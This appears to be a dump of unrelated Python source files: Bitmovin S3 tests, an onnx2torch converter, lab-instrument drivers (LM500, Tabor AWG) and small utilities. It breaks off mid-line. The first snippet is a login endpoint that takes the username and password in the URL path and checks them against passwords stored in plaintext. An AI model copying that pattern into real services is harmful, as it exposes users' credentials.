content
stringlengths
5
1.05M
from ApiObject import * class connect(ApiObject): def __init__(self): super(connect, self).__init__() self.uri = self.uri + "/<username>/<password>" def get(self, **url_params): return super(connect, self).get() def on_get(self, **url_params): content = self.db_service.get_content_where("accounts", "erp", "name", url_params['username']) id = content[0] name = content[1] pwd = content[2] creationdate = content[3] if name == url_params['username'] and pwd == url_params['password']: return "authorized" else: return "unauthorized"
import unittest import json from bitmovin import Bitmovin, Response, S3Input from bitmovin.errors import BitmovinApiError from tests.bitmovin import BitmovinTestCase class S3InputTests(BitmovinTestCase): @classmethod def setUpClass(cls): super().setUpClass() @classmethod def tearDownClass(cls): super().tearDownClass() def setUp(self): super().setUp() self.bitmovin = Bitmovin(self.api_key) self.assertIsNotNone(self.bitmovin) self.assertTrue(isinstance(self.bitmovin, Bitmovin)) def tearDown(self): super().tearDown() def test_create_s3_input(self): (sample_input, sample_files) = self._get_sample_s3_input() input_resource_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(input_resource_response) self.assertIsNotNone(input_resource_response.resource) self.assertIsNotNone(input_resource_response.resource.id) self._compare_s3_inputs(sample_input, input_resource_response.resource) def test_create_s3_input_without_name(self): (sample_input, sample_files) = self._get_sample_s3_input() sample_input.name = None input_resource_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(input_resource_response) self.assertIsNotNone(input_resource_response.resource) self.assertIsNotNone(input_resource_response.resource.id) self._compare_s3_inputs(sample_input, input_resource_response.resource) def test_retrieve_s3_input(self): (sample_input, sample_files) = self._get_sample_s3_input() created_input_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(created_input_response) self.assertIsNotNone(created_input_response.resource) self.assertIsNotNone(created_input_response.resource.id) self._compare_s3_inputs(sample_input, created_input_response.resource) retrieved_input_response = self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id) self.assertIsNotNone(retrieved_input_response) self.assertIsNotNone(retrieved_input_response.resource) self._compare_s3_inputs(created_input_response.resource, retrieved_input_response.resource) def test_delete_s3_input(self): (sample_input, sample_files) = self._get_sample_s3_input() created_input_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(created_input_response) self.assertIsNotNone(created_input_response.resource) self.assertIsNotNone(created_input_response.resource.id) self._compare_s3_inputs(sample_input, created_input_response.resource) deleted_minimal_resource = self.bitmovin.inputs.S3.delete(created_input_response.resource.id) self.assertIsNotNone(deleted_minimal_resource) self.assertIsNotNone(deleted_minimal_resource.resource) self.assertIsNotNone(deleted_minimal_resource.resource.id) try: self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id) self.fail( 'Previous statement should have thrown an exception. ' + 'Retrieving input after deleting it shouldn\'t be possible.' ) except BitmovinApiError: pass def test_list_s3_inputs(self): (sample_input, sample_files) = self._get_sample_s3_input() created_input_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(created_input_response) self.assertIsNotNone(created_input_response.resource) self.assertIsNotNone(created_input_response.resource.id) self._compare_s3_inputs(sample_input, created_input_response.resource) inputs = self.bitmovin.inputs.S3.list() self.assertIsNotNone(inputs) self.assertIsNotNone(inputs.resource) self.assertIsNotNone(inputs.response) self.assertIsInstance(inputs.resource, list) self.assertIsInstance(inputs.response, Response) self.assertGreater(inputs.resource.__sizeof__(), 1) def test_retrieve_s3_input_custom_data(self): (sample_input, sample_files) = self._get_sample_s3_input() sample_input.customData = '<pre>my custom data</pre>' created_input_response = self.bitmovin.inputs.S3.create(sample_input) self.assertIsNotNone(created_input_response) self.assertIsNotNone(created_input_response.resource) self.assertIsNotNone(created_input_response.resource.id) self._compare_s3_inputs(sample_input, created_input_response.resource) custom_data_response = self.bitmovin.inputs.S3.retrieve_custom_data(created_input_response.resource.id) custom_data = custom_data_response.resource self.assertEqual(sample_input.customData, json.loads(custom_data.customData)) def _compare_s3_inputs(self, first: S3Input, second: S3Input): """ :param first: S3Input :param second: S3Input :return: bool """ self.assertEqual(first.bucketName, second.bucketName) self.assertEqual(first.cloudRegion, second.cloudRegion) self.assertEqual(first.name, second.name) self.assertEqual(first.description, second.description) def _get_sample_s3_input(self): s3_input_settings = self.settings.get('sampleObjects').get('inputs').get('s3')\ .get('9acae039-226b-46a3-8bae-706ae50b33c2') files = s3_input_settings.get('files') s3_input = S3Input( access_key=s3_input_settings.get('accessKey'), secret_key=s3_input_settings.get('secretKey'), bucket_name=s3_input_settings.get('bucketName'), cloud_region=s3_input_settings.get('cloudRegion'), name='Sample S3 Input' ) self.assertIsNotNone(s3_input.accessKey) self.assertIsNotNone(s3_input.secretKey) self.assertIsNotNone(s3_input.bucketName) self.assertIsNotNone(s3_input.cloudRegion) return s3_input, files if __name__ == '__main__': unittest.main()
from ipaserver.plugins.user import user from ipalib import Bytes, _ user.takes_params += ( Bytes( 'jpegphoto?', cli_name='avatar', label=_("Avatar"), doc=_("Base-64 encoded user picture (jpegphoto)"), maxlength=100 * 1024, # max 100 kB ), )
from Constant import PARAM_MAX_DELTAS, STATUS_CODES def is_there_a_spike(sensor_reading, next_sensor_reading, max_delta): if next_sensor_reading - sensor_reading > max_delta: return True return False def detect_spike_in_sensor_stream(param_name, sensor_stream): max_delta = PARAM_MAX_DELTAS[param_name] for index, sensor_reading in enumerate(sensor_stream[:-1]): next_sensor_reading = sensor_stream[index + 1] if is_there_a_spike(sensor_reading, next_sensor_reading, max_delta): return STATUS_CODES["500"] return STATUS_CODES["200"] def validate_sensor_stream(param_name, sensor_stream): if sensor_stream is None: return STATUS_CODES["400"] if param_name not in PARAM_MAX_DELTAS: return STATUS_CODES["404"] return detect_spike_in_sensor_stream(param_name, sensor_stream)
"""qp is a library for manaing and converting between different representations of distributions""" import os from .version import __version__ from .spline_pdf import * from .hist_pdf import * from .interp_pdf import * from .quant_pdf import * from .mixmod_pdf import * from .sparse_pdf import * from .scipy_pdfs import * from .ensemble import Ensemble from .factory import instance, add_class, create, read, convert, concatenate from . import utils from . import test_funcs
__all__ = ['OnnxTranspose'] from typing import List from typing import Optional import torch from torch import nn from onnx2torch.node_converters.registry import add_converter from onnx2torch.onnx_graph import OnnxGraph from onnx2torch.onnx_node import OnnxNode from onnx2torch.utils.common import OnnxMapping from onnx2torch.utils.common import OnnxToTorchModule from onnx2torch.utils.common import OperationConverterResult class OnnxTranspose(nn.Module, OnnxToTorchModule): def __init__(self, perm: Optional[List[int]] = None): super().__init__() self.perm = perm def forward(self, input_tensor: torch.Tensor) -> torch.Tensor: if self.perm is None: self.perm = list(range(input_tensor.dim()))[::-1] return input_tensor.permute(self.perm) @add_converter(operation_type='Transpose', version=1) @add_converter(operation_type='Transpose', version=13) def _(node: OnnxNode, graph: OnnxGraph) -> OperationConverterResult: # pylint: disable=unused-argument input_values = [node.input_values[0]] perm_value_name = node.input_values[1] if len(node.input_values) > 1 else None if perm_value_name is not None: perm = graph.initializers[perm_value_name].to_torch().tolist() else: perm = node.attributes.get('perm', None) if perm is not None: perm = torch.tensor(perm, dtype=torch.long).tolist() return OperationConverterResult( torch_module=OnnxTranspose(perm=perm), onnx_mapping=OnnxMapping( inputs=tuple(input_values), outputs=node.output_values, ), )
import collections from typing import List from test_framework import generic_test PairedTasks = collections.namedtuple('PairedTasks', ('task_1', 'task_2')) def optimum_task_assignment(task_durations: List[int]) -> List[PairedTasks]: # TODO - you fill in here. return [] if __name__ == '__main__': exit( generic_test.generic_test_main('task_pairing.py', 'task_pairing.tsv', optimum_task_assignment))
"""Cadence bin. Author: Jose Vines """ import numpy as np def cadence_bin(times, data, dt): """Bins timeseries data with cadence dt. Parameters: ----------- times : array_like The times to bin in cadence dt. data : array_like Data corresponding to time times. dt : float Time cadence to bin into in minutes. Returns: -------- binned_times : array_like The binned times binned_data : array_like The binned data corresponding to the median of all the original data values inside a bin. binned_errs : array_like The binned errors calculated as the square root of the variance of the data inside a given bin, divided by the square root of the number of data points inside the bin. """ # First calculate the dt in JD dt *= 60 / 86400 # Grab initial and final time in the timeseries ti = times[0] tf = times[-1] # Calculate number of bins n = int(np.ceil((tf - ti) / dt)) binned_times = np.zeros(n - 1) binned_data = np.zeros(n - 1) binned_errs = np.zeros(n - 1) t = np.linspace(ti, tf, n) for i in range(0, n - 1): low = t[i] < times up = times < t[i + 1] bin_n = len(times[low * up]) if ~np.any(low * up): continue binned_times[i] = np.median(times[low * up]) binned_data[i] = np.median(data[low * up]) binned_errs[i] = np.sqrt(np.var(data[low * up]) / bin_n) no_zeroes = binned_times != 0 no_nans = ~np.isnan(binned_data) binned_times = binned_times[no_zeroes * no_nans] binned_data = binned_data[no_zeroes * no_nans] binned_errs = binned_errs[no_zeroes * no_nans] return binned_times, binned_data, binned_errs
from ...core.utils.py3 import textstring from ...core.devio import SCPI, backend #@UnresolvedImport _depends_local=["...core.devio.SCPI"] class LM500(SCPI.SCPIDevice): """ Cryomagnetics LM500/510 level monitor. Channels are enumerated from 1. To abort filling or reset a timeout, call :meth:`.SCPIDevice.reset` method. Args: conn: serial connection parameters (usually port or a tuple containing port and baudrate) """ def __init__(self, conn): conn=backend.SerialDeviceBackend.combine_conn(conn,("COM1",9600)) SCPI.SCPIDevice.__init__(self,conn,backend="serial") self.instr.term_read="\n" self.instr.term_write="\n" try: self.write("ERROR 0") self.write("REMOTE") except self.instr.Error: self.close() self._add_settings_node("interval",self.get_interval,self.set_interval,ignore_error=(RuntimeError,)) self._add_status_node("level",self.get_level,mux=([1,2],)) self._add_status_node("fill_status",self.get_fill_status,mux=([1,2],)) self._add_settings_node("high_level",self.get_high_level,self.set_high_level,mux=([1,2],1)) self._add_settings_node("low_level",self.get_low_level,self.set_low_level,mux=([1,2],1)) def close(self): """Close connection to the device""" try: self.write("LOCAL") finally: SCPI.SCPIDevice.close(self) _reset_comm="*RST;REMOTE" def _instr_write(self, msg): return self.instr.write(msg,read_echo=True,read_echo_delay=0.1) def _instr_read(self, raw=False): data="" while not data: data=self.instr.readline(remove_term=True).strip() return data def get_channel(self): """Get current measurement channel""" return self.ask("CHAN?","int") def set_channel(self, channel=1): """Set current measurement channel""" self.write("CHAN",channel) return self.get_channel() def get_type(self, channel=1): """Get channel type (``"LHe"`` or ``"LN"``)""" chan_type=self.ask("TYPE? {}".format(channel),"int") return ["LHe","LN"][chan_type] def _check_channel_LHe(self, op, channel=None): if channel is None: channel=self.get_channel() if self.get_type(channel)=="LN": raise RuntimeError("LN channel doesn't support {}".format(op)) def get_mode(self): """Get measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)""" self._check_channel_LHe("measurement modes") return self.ask("MODE?").upper() def set_mode(self, mode): """Set measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)""" self._check_channel_LHe("measurement modes") self.write("MODE",mode) return self.get_mode() @staticmethod def _str_to_sec(s): s=s.strip().split(":") s=[int(n.strip()) for n in s] return s[0]*60**2+s[1]*60+s[2] @staticmethod def _sec_to_str(s): return "{:02d}:{:02d}:{:02d}".format(int(s/60.**2),int((s/60.)%60.),int(s%60.)) def get_interval(self): """Get measurement interval in sample/hold mode (in seconds)""" self._check_channel_LHe("measurement intervals") return self._str_to_sec(self.ask("INTVL?")) def set_interval(self, intvl): """Set measurement interval in sample/hold mode (in seconds)""" self._check_channel_LHe("measurement intervals") if not isinstance(intvl,textstring): intvl=self._sec_to_str(intvl) self.write("INTVL",intvl) return self.get_interval() def start_meas(self, channel=1): """Initialize measurement on a given channel""" self.write("MEAS",channel) def _get_stb(self): return self.ask("*STB?","int") def wait_meas(self, channel=1): """Wait for a measurement on a given channel to finish""" mask=0x01 if channel==1 else 0x04 while not self._get_stb()&mask: self.sleep(0.1) def get_level(self, channel=1): """Get level reading on a given channel""" res=self.ask("MEAS? {}".format(channel)) return float(res.split()[0]) def measure_level(self, channel=1): """Measure the level (initialize a measurement and return the result) on a given channel""" self.start_meas(channel=channel) self.wait_meas(channel=channel) return self.get_level(channel=channel) def start_fill(self, channel=1): """Initialize filling at a given channels""" self.write("FILL",channel) def get_fill_status(self, channel=1): """ Get filling status at a given channels. Return either ``"off"`` (filling is off), ``"timeout"`` (filling timed out) or a float (time since filling started, in seconds) """ res=self.ask("FILL? {}".format(channel)).lower() if res in {"off","timeout"}: return res spres=res.split() if len(spres)==1 or spres[1] in ["m","min"]: return float(spres[0])*60. if spres[1] in ["s","sec"]: return float(spres[0]) raise ValueError("unexpected response: {}".format(res)) def get_low_level(self, channel=1): """Get low level setting on a given channel""" self.set_channel(channel) return float(self.ask("LOW?").split()[0]) def set_low_level(self, level, channel=1): """Set low level setting on a given channel""" self.set_channel(channel) self.write("LOW",level) def get_high_level(self, channel=1): """Get high level setting on a given channel""" self.set_channel(channel) return float(self.ask("HIGH?").split()[0]) def set_high_level(self, level, channel=1): """Set high level setting on a given channel""" self.set_channel(channel) self.write("HIGH",level)
import functools import logging import numbers import sys import weakref import warnings from typing import List, Tuple, Set, Callable, Optional, Any, cast, Union, Dict, Mapping, NamedTuple, Iterable,\ Collection, Sequence from collections import OrderedDict import numpy as np from qupulse import ChannelID from qupulse._program._loop import Loop, make_compatible from qupulse.hardware.feature_awg.channel_tuple_wrapper import ChannelTupleAdapter from qupulse.hardware.feature_awg.features import ChannelSynchronization, AmplitudeOffsetHandling, VoltageRange, \ ProgramManagement, ActivatableChannels, DeviceControl, StatusTable, SCPI, VolatileParameters, \ ReadProgram, RepetitionMode from qupulse.hardware.util import voltage_to_uint16, find_positions from qupulse.utils.types import TimeType from qupulse.hardware.feature_awg.base import AWGChannelTuple, AWGChannel, AWGDevice, AWGMarkerChannel from qupulse._program.tabor import TaborSegment, TaborException, TaborProgram, PlottableProgram, TaborSequencing, \ make_combined_wave import tabor_control.device import pyvisa assert (sys.byteorder == "little") __all__ = ["TaborDevice", "TaborChannelTuple", "TaborChannel"] TaborProgramMemory = NamedTuple("TaborProgramMemory", [("waveform_to_segment", np.ndarray), ("program", TaborProgram)]) def with_configuration_guard(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[ ["TaborChannelTuple"], Any]: """This decorator assures that the AWG is in configuration mode while the decorated method runs.""" @functools.wraps(function_object) def guarding_method(channel_pair: "TaborChannelTuple", *args, **kwargs) -> Any: if channel_pair._configuration_guard_count == 0: channel_pair._enter_config_mode() channel_pair._configuration_guard_count += 1 try: return function_object(channel_pair, *args, **kwargs) finally: channel_pair._configuration_guard_count -= 1 if channel_pair._configuration_guard_count == 0: channel_pair._exit_config_mode() return guarding_method def with_select(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[["TaborChannelTuple"], Any]: """Asserts the channel pair is selcted when the wrapped function is called""" @functools.wraps(function_object) def selector(channel_tuple: "TaborChannelTuple", *args, **kwargs) -> Any: channel_tuple._select() return function_object(channel_tuple, *args, **kwargs) return selector ######################################################################################################################## # Device ######################################################################################################################## # Features class TaborSCPI(SCPI): def __init__(self, device: "TaborDevice", visa: pyvisa.resources.MessageBasedResource): super().__init__(visa) self._parent = weakref.ref(device) def send_cmd(self, cmd_str, paranoia_level=None): for instr in self._parent().all_devices: instr.send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level) def send_query(self, query_str, query_mirrors=False) -> Any: if query_mirrors: return tuple(instr.send_query(query_str) for instr in self._parent().all_devices) else: return self._parent().main_instrument.send_query(query_str) def _send_cmd(self, cmd_str, paranoia_level=None) -> Any: """Overwrite send_cmd for paranoia_level > 3""" if paranoia_level is None: paranoia_level = self._parent().paranoia_level if paranoia_level < 3: self._parent().super().send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level) # pragma: no cover else: cmd_str = cmd_str.rstrip() if len(cmd_str) > 0: ask_str = cmd_str + "; *OPC?; :SYST:ERR?" else: ask_str = "*OPC?; :SYST:ERR?" *answers, opc, error_code_msg = self._parent()._visa_inst.ask(ask_str).split(";") error_code, error_msg = error_code_msg.split(",") error_code = int(error_code) if error_code != 0: _ = self._parent()._visa_inst.ask("*CLS; *OPC?") if error_code == -450: # query queue overflow self.send_cmd(cmd_str) else: raise RuntimeError("Cannot execute command: {}\n{}: {}".format(cmd_str, error_code, error_msg)) assert len(answers) == 0 class TaborChannelSynchronization(ChannelSynchronization): """This Feature is used to synchronise a certain ammount of channels""" def __init__(self, device: "TaborDevice"): super().__init__() self._parent = weakref.ref(device) def synchronize_channels(self, group_size: int) -> None: """ Synchronize in groups of `group_size` channels. Groups of synchronized channels will be provided as AWGChannelTuples. The channel_size must be evenly dividable by the number of channels Args: group_size: Number of channels per channel tuple """ if group_size == 2: self._parent()._channel_tuples = [] for i in range((int)(len(self._parent().channels) / group_size)): self._parent()._channel_tuples.append( TaborChannelTuple((i + 1), self._parent(), self._parent().channels[(i * group_size):((i * group_size) + group_size)], self._parent().marker_channels[(i * group_size):((i * group_size) + group_size)]) ) self._parent()[SCPI].send_cmd(":INST:COUP:STAT OFF") elif group_size == 4: self._parent()._channel_tuples = [TaborChannelTuple(1, self._parent(), self._parent().channels, self._parent().marker_channels)] self._parent()[SCPI].send_cmd(":INST:COUP:STAT ON") else: raise TaborException("Invalid group size") class TaborDeviceControl(DeviceControl): """This feature is used for basic communication with a AWG""" def __init__(self, device: "TaborDevice"): super().__init__() self._parent = weakref.ref(device) def reset(self) -> None: """ Resetting the whole device. A command for resetting is send to the Device, the device is initialized again and all channel tuples are cleared. """ self._parent()[SCPI].send_cmd(":RES") self._parent()._coupled = None self._parent()._initialize() for channel_tuple in self._parent().channel_tuples: channel_tuple[TaborProgramManagement].clear() def trigger(self) -> None: """ This method triggers a device remotely. """ self._parent()[SCPI].send_cmd(":TRIG") class TaborStatusTable(StatusTable): def __init__(self, device: "TaborDevice"): super().__init__() self._parent = device def get_status_table(self) -> Dict[str, Union[str, float, int]]: """ Send a lot of queries to the AWG about its settings. A good way to visualize is using pandas.DataFrame Returns: An ordered dictionary with the results """ name_query_type_list = [("channel", ":INST:SEL?", int), ("coupling", ":OUTP:COUP?", str), ("volt_dc", ":SOUR:VOLT:LEV:AMPL:DC?", float), ("volt_hv", ":VOLT:HV?", float), ("offset", ":VOLT:OFFS?", float), ("outp", ":OUTP?", str), ("mode", ":SOUR:FUNC:MODE?", str), ("shape", ":SOUR:FUNC:SHAPE?", str), ("dc_offset", ":SOUR:DC?", float), ("freq_rast", ":FREQ:RAST?", float), ("gated", ":INIT:GATE?", str), ("continuous", ":INIT:CONT?", str), ("continuous_enable", ":INIT:CONT:ENAB?", str), ("continuous_source", ":INIT:CONT:ENAB:SOUR?", str), ("marker_source", ":SOUR:MARK:SOUR?", str), ("seq_jump_event", ":SOUR:SEQ:JUMP:EVEN?", str), ("seq_adv_mode", ":SOUR:SEQ:ADV?", str), ("aseq_adv_mode", ":SOUR:ASEQ:ADV?", str), ("marker", ":SOUR:MARK:SEL?", int), ("marker_high", ":MARK:VOLT:HIGH?", str), ("marker_low", ":MARK:VOLT:LOW?", str), ("marker_width", ":MARK:WIDT?", int), ("marker_state", ":MARK:STAT?", str)] data = OrderedDict((name, []) for name, *_ in name_query_type_list) for ch in (1, 2, 3, 4): self._parent.channels[ch - 1]._select() self._parent.marker_channels[(ch - 1) % 2]._select() for name, query, dtype in name_query_type_list: data[name].append(dtype(self._parent[SCPI].send_query(query))) return data # Implementation class TaborDevice(AWGDevice): def __init__(self, device_name: str, instr_addr=None, paranoia_level=1, external_trigger=False, reset=False, mirror_addresses=()): """ Constructor for a Tabor device Args: device_name (str): Name of the device instr_addr: Instrument address that is forwarded to tabor_control paranoia_level (int): Paranoia level that is forwarded to tabor_control external_trigger (bool): Not supported yet reset (bool): mirror_addresses: list of devices on which the same things as on the main device are done. For example you can a simulator and a real Device at once """ super().__init__(device_name) self._instr = tabor_control.device.TEWXAwg(tabor_control.open_session(instr_addr), paranoia_level) self._mirrors = tuple(tabor_control.device.TEWXAwg(tabor_control.open_session(address), paranoia_level) for address in mirror_addresses) self._coupled = None self._clock_marker = [0, 0, 0, 0] self.add_feature(TaborSCPI(self, self.main_instrument._visa_inst)) self.add_feature(TaborDeviceControl(self)) self.add_feature(TaborStatusTable(self)) if reset: self[SCPI].send_cmd(":RES") # Channel self._channels = [TaborChannel(i + 1, self) for i in range(4)] # MarkerChannels self._marker_channels = [TaborMarkerChannel(i + 1, self) for i in range(4)] self._initialize() # ChannelTuple self._channel_tuples = [] self.add_feature(TaborChannelSynchronization(self)) self[TaborChannelSynchronization].synchronize_channels(2) if external_trigger: raise NotImplementedError() # pragma: no cover def enable(self) -> None: """ This method immediately generates the selected output waveform, if the device is in continuous and armed repetition mode. """ self[SCPI].send_cmd(":ENAB") def abort(self) -> None: """ With abort you can terminate the current generation of the output waveform. When the output waveform is terminated the output starts generating an idle waveform. """ self[SCPI].send_cmd(":ABOR") def set_coupled(self, coupled: bool) -> None: """ Thats the coupling of the device to 'coupled' """ if coupled: self[SCPI].send_cmd("INST:COUP:STAT ON") else: self[SCPI].send_cmd("INST:COUP:STAT OFF") def _is_coupled(self) -> bool: """ Returns true if the coupling of the device is 'coupled' otherwise false """ if self._coupled is None: return self[SCPI].send_query(":INST:COUP:STAT?") == "ON" else: return self._coupled def cleanup(self) -> None: for channel_tuple in self.channel_tuples: channel_tuple.cleanup() @property def channels(self) -> Collection["TaborChannel"]: """Returns a list of all channels of a Device""" return self._channels @property def marker_channels(self) -> Collection["TaborMarkerChannel"]: """Returns a list of all marker channels of a device. The collection may be empty""" return self._marker_channels @property def channel_tuples(self) -> Collection["TaborChannelTuple"]: """Returns a list of all channel tuples of a list""" return self._channel_tuples @property def main_instrument(self) -> tabor_control.device.TEWXAwg: return self._instr @property def mirrored_instruments(self) -> Sequence[tabor_control.device.TEWXAwg]: return self._mirrors @property def all_devices(self) -> Sequence[tabor_control.device.TEWXAwg]: return (self._instr,) + self._mirrors @property def _paranoia_level(self) -> tabor_control.ParanoiaLevel: return self._instr.paranoia_level @_paranoia_level.setter def _paranoia_level(self, val): for instr in self.all_devices: instr.paranoia_level = val @property def dev_properties(self) -> dict: return self._instr.dev_properties.as_dict() def _send_binary_data(self, bin_dat, paranoia_level=None): for instr in self.all_devices: instr.write_segment_data(bin_dat, paranoia_level=paranoia_level) def _download_segment_lengths(self, seg_len_list, paranoia_level=None): for instr in self.all_devices: instr.write_segment_lengths(seg_len_list, paranoia_level=paranoia_level) def _download_sequencer_table(self, seq_table, paranoia_level=None): for instr in self.all_devices: instr.write_sequencer_table(seq_table, paranoia_level=paranoia_level) def _download_adv_seq_table(self, seq_table, paranoia_level=None): for instr in self.all_devices: instr.write_advanced_sequencer_table(seq_table, paranoia_level=paranoia_level) def _initialize(self) -> None: # 1. Select channel # 2. Turn off gated mode # 3. Turn on continous mode # 4. Armed mode (only generate waveforms after enab command) # 5. Expect enable signal from (USB / LAN / GPIB) # 6. Use arbitrary waveforms as marker source # 7. Expect jump command for sequencing from (USB / LAN / GPIB) setup_command = ( ":INIT:GATE OFF; :INIT:CONT ON; " ":INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR BUS;" ":SOUR:MARK:SOUR USER; :SOUR:SEQ:JUMP:EVEN BUS ") self[SCPI].send_cmd(":INST:SEL 1") self[SCPI].send_cmd(setup_command) self[SCPI].send_cmd(":INST:SEL 3") self[SCPI].send_cmd(setup_command) def _get_readable_device(self, simulator=True) -> tabor_control.device.TEWXAwg: """ A method to get the first readable device out of all devices. A readable device is a device which you can read data from like a simulator. Returns: The first readable device out of all devices Throws: TaborException: this exception is thrown if there is no readable device in the list of all devices """ for device in self.all_devices: if device.supports_basic_reading(): if simulator: if device.is_simulator: return device else: return device raise TaborException("No device capable of device data read") ######################################################################################################################## # Channel ######################################################################################################################## # Features class TaborVoltageRange(VoltageRange): def __init__(self, channel: "TaborChannel"): super().__init__() self._parent = weakref.ref(channel) @property @with_select def offset(self) -> float: """Get offset of AWG channel""" return float( self._parent().device[SCPI].send_query(":VOLT:OFFS?".format(channel=self._parent().idn))) @property @with_select def amplitude(self) -> float: """Get amplitude of AWG channel""" coupling = self._parent().device[SCPI].send_query(":OUTP:COUP?") if coupling == "DC": return float(self._parent().device[SCPI].send_query(":VOLT?")) elif coupling == "HV": return float(self._parent().device[SCPI].send_query(":VOLT:HV?")) else: raise TaborException("Unknown coupling: {}".format(coupling)) @property def amplitude_offset_handling(self) -> AmplitudeOffsetHandling: """ Gets the amplitude and offset handling of this channel. The amplitude-offset controls if the amplitude and offset settings are constant or if these should be optimized by the driver """ return self._parent()._amplitude_offset_handling @amplitude_offset_handling.setter def amplitude_offset_handling(self, amp_offs_handling: Union[AmplitudeOffsetHandling, str]) -> None: """ amp_offs_handling: See possible values at `AWGAmplitudeOffsetHandling` """ amp_offs_handling = AmplitudeOffsetHandling(AmplitudeOffsetHandling) self._parent()._amplitude_offset_handling = amp_offs_handling def _select(self) -> None: self._parent()._select() class TaborActivatableChannels(ActivatableChannels): def __init__(self, channel: "TaborChannel"): super().__init__() self._parent = weakref.ref(channel) @property def enabled(self) -> bool: """ Returns the the state a channel has at the moment. A channel is either activated or deactivated True stands for activated and false for deactivated """ return self._parent().device[SCPI].send_query(":OUTP ?") == "ON" @with_select def enable(self): """Enables the output of a certain channel""" command_string = ":OUTP ON".format(ch_id=self._parent().idn) self._parent().device[SCPI].send_cmd(command_string) @with_select def disable(self): """Disables the output of a certain channel""" command_string = ":OUTP OFF".format(ch_id=self._parent().idn) self._parent().device[SCPI].send_cmd(command_string) def _select(self) -> None: self._parent()._select() # Implementation class TaborChannel(AWGChannel): def __init__(self, idn: int, device: TaborDevice): super().__init__(idn) self._device = weakref.ref(device) self._amplitude_offset_handling = AmplitudeOffsetHandling.IGNORE_OFFSET # adding Features self.add_feature(TaborVoltageRange(self)) self.add_feature(TaborActivatableChannels(self)) @property def device(self) -> TaborDevice: """Returns the device that the channel belongs to""" return self._device() @property def channel_tuple(self) -> "TaborChannelTuple": """Returns the channel tuple that this channel belongs to""" return self._channel_tuple() def _set_channel_tuple(self, channel_tuple: "TaborChannelTuple") -> None: """ The channel tuple "channel_tuple" is assigned to this channel Args: channel_tuple (TaborChannelTuple): the channel tuple that this channel belongs to """ self._channel_tuple = weakref.ref(channel_tuple) def _select(self) -> None: self.device[SCPI].send_cmd(":INST:SEL {channel}".format(channel=self.idn)) ######################################################################################################################## # ChannelTuple ######################################################################################################################## # Features class TaborProgramManagement(ProgramManagement): def __init__(self, channel_tuple: "TaborChannelTuple"): super().__init__(channel_tuple) self._programs = {} self._armed_program = None self._idle_sequence_table = [(1, 1, 0), (1, 1, 0), (1, 1, 0)] self._trigger_source = 'BUS' def get_repetition_mode(self, program_name: str) -> str: """ Returns the default repetition mode of a certain program Args: program_name (str): name of the program whose repetition mode should be returned """ return self._channel_tuple._known_programs[program_name].program._repetition_mode def set_repetition_mode(self, program_name: str, repetition_mode: str) -> None: """ Changes the default repetition mode of a certain program Args: program_name (str): name of the program whose repetition mode should be changed Throws: ValueError: this Exception is thrown when an invalid repetition mode is given """ if repetition_mode in ("infinite", "once"): self._channel_tuple._known_programs[program_name].program._repetition_mode = repetition_mode else: raise ValueError("{} is no vaild repetition mode".format(repetition_mode)) @property def supported_repetition_modes(self) -> Set[RepetitionMode]: return {RepetitionMode.INFINITE} @with_configuration_guard @with_select def upload(self, name: str, program: Loop, channels: Tuple[Optional[ChannelID], Optional[ChannelID]], marker_channels: Tuple[Optional[ChannelID], Optional[ChannelID]], voltage_transformation: Tuple[Callable, Callable], repetition_mode: str = None, force: bool = False) -> None: """ Upload a program to the AWG. The policy is to prefer amending the unknown waveforms to overwriting old ones. """ if repetition_mode is None: repetition_mode = self._default_repetition_mode else: repetition_mode = RepetitionMode(repetition_mode) if repetition_mode not in self.supported_repetition_modes: raise ValueError(f"{repetition_mode} is not supported on {self._channel_tuple}") if len(channels) != len(self._channel_tuple.channels): raise ValueError("Wrong number of channels") if len(marker_channels) != len(self._channel_tuple.marker_channels): raise ValueError("Wrong number of marker") if len(voltage_transformation) != len(self._channel_tuple.channels): raise ValueError("Wrong number of voltage transformations") # adjust program to fit criteria sample_rate = self._channel_tuple.device.channel_tuples[0].sample_rate make_compatible(program, minimal_waveform_length=192, waveform_quantum=16, sample_rate=sample_rate / 10 ** 9) if name in self._channel_tuple._known_programs: if force: self._channel_tuple.free_program(name) else: raise ValueError('{} is already known on {}'.format(name, self._channel_tuple.idn)) # They call the peak to peak range amplitude ranges = tuple(ch[VoltageRange].amplitude for ch in self._channel_tuple.channels) voltage_amplitudes = tuple(range / 2 for range in ranges) voltage_offsets = [] for channel in self._channel_tuple.channels: if channel._amplitude_offset_handling == AmplitudeOffsetHandling.IGNORE_OFFSET: voltage_offsets.append(0) elif channel._amplitude_offset_handling == AmplitudeOffsetHandling.CONSIDER_OFFSET: voltage_offsets.append(channel[VoltageRange].offset) else: raise NotImplementedError( '{} is invalid as AWGAmplitudeOffsetHandling'.format(channel._amplitude_offset_handling)) voltage_offsets = tuple(voltage_offsets) # parse to tabor program tabor_program = TaborProgram(program, channels=tuple(channels), markers=marker_channels, device_properties=self._channel_tuple.device.dev_properties, sample_rate=sample_rate / 10 ** 9, amplitudes=voltage_amplitudes, offsets=voltage_offsets, voltage_transformations=voltage_transformation) segments, segment_lengths = tabor_program.get_sampled_segments() waveform_to_segment, to_amend, to_insert = self._channel_tuple._find_place_for_segments_in_memory(segments, segment_lengths) self._channel_tuple._segment_references[waveform_to_segment[waveform_to_segment >= 0]] += 1 for wf_index in np.flatnonzero(to_insert > 0): segment_index = to_insert[wf_index] self._channel_tuple._upload_segment(to_insert[wf_index], segments[wf_index]) waveform_to_segment[wf_index] = segment_index if np.any(to_amend): segments_to_amend = [segments[idx] for idx in np.flatnonzero(to_amend)] waveform_to_segment[to_amend] = self._channel_tuple._amend_segments(segments_to_amend) self._channel_tuple._known_programs[name] = 